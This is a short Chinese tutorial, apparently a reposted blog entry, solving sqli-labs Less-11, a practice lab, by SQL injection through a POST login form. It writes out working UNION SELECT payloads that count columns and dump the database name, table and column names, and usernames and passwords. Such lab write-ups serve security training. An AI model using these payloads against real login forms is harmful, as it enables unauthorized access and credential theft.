sqli-labs less11 POST注入

注入工具：burp

(1)判斷類型：
burp抓包，看到傳參admin，是可以正常顯示的：

and 1 = 1

異常，估計(jì)不是數(shù)字型

嘗試單引號(hào)：

報(bào)錯(cuò)了，好征兆

and 1=1 --+

and 1 = 2 --+

由此，斷定這個(gè)字符型 的閉合就是’

(2)判斷字段個(gè)數(shù)：

order by 1回顯正常

order by 2回顯正常

order by 3回顯錯(cuò)誤

判斷字段個(gè)數(shù)是2個(gè)

（3）判斷回顯位置：

顯然，兩個(gè)回顯位置都可以

（4）爆數(shù)據(jù)庫(kù)名：
uname=-1 ’ union select 1,database() --+ &passwd=admin&submit=Submit

數(shù)據(jù)庫(kù)名：security

（5）數(shù)據(jù)表名：
uname=-1 ’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit

數(shù)據(jù)表名：
emails,referers,uagents,users

（6）挑選數(shù)據(jù)表users進(jìn)行查詢：
uname=-1 ’ union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’ --+ &passwd=admin&submit=Submit

查詢到字段：
id,username,password

(7)爆數(shù)據(jù)：

uname=-1 ’ union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit

總結(jié)

以上是生活随笔為你收集整理的sqli-labs less11 POST注入-字符型的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。